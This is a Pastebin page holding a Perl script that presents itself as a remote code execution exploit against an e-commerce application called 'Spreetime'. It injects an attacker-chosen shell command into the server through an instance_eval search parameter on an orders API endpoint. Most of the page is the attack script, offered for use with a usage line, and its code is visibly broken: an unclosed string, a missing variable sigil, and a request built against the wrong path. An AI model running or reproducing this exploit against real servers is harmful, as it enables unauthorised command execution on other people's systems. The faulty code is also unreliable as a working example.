Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- ## Spreetime (r00t time) RCE exploit coded by xd / HaqNET (#Haxnet@EFNET)
- ## greetz: to those who deserve them, all my friends from haxnet... the goods ones :P
- ##use warnings; ## uncomment this to debug..
- use IO::Socket::INET;
- sub usage {
- print "perl $0 <IP/Host> <CMD>\n";
- exit(1);
- }
- my($host, $cmd) = @ARGV or usage();
- print "[+] Connecting to..\n";
- my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort => 80,Timeout => 10) or die "[-] Connect error..\n";
- if(!sock) {
- print "[-] No connection to the box was made!\n";
- exit(-1);
- } else {
- print "[+] Connected.. Sending Bad stuffs..\n";
- my $temp= "$host + 'api/orders.json?search[instance_eval]=Kernel.fork%20do%60 . $cmd . %60end";
- ##$req = HTTP::Request->new("POST", $host); ## hrmm
- print "[+] Sent evil buffer.. waiting..\n";
- my $buffer_size=length($temp);
- $buffer=
- "POST / HTTP/1.1\n".
- "Host: $host:80\n".
- "Keep-Alive: 300\n".
- "Connection: Close\n".
- "Referer: ABXD\n".
- "Cookie: sid=1; testing=1;\n".
- "Content-Type: plain/text;
- $temp;
- $buffer=~s/buffer_size/$cmd/g;
- ##print $sock $buffer;
- if ($sock) { ## makesure still connected
- print "[+] Buffer sent.. running command: $cmd\n";
- print $sock $buffer;
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
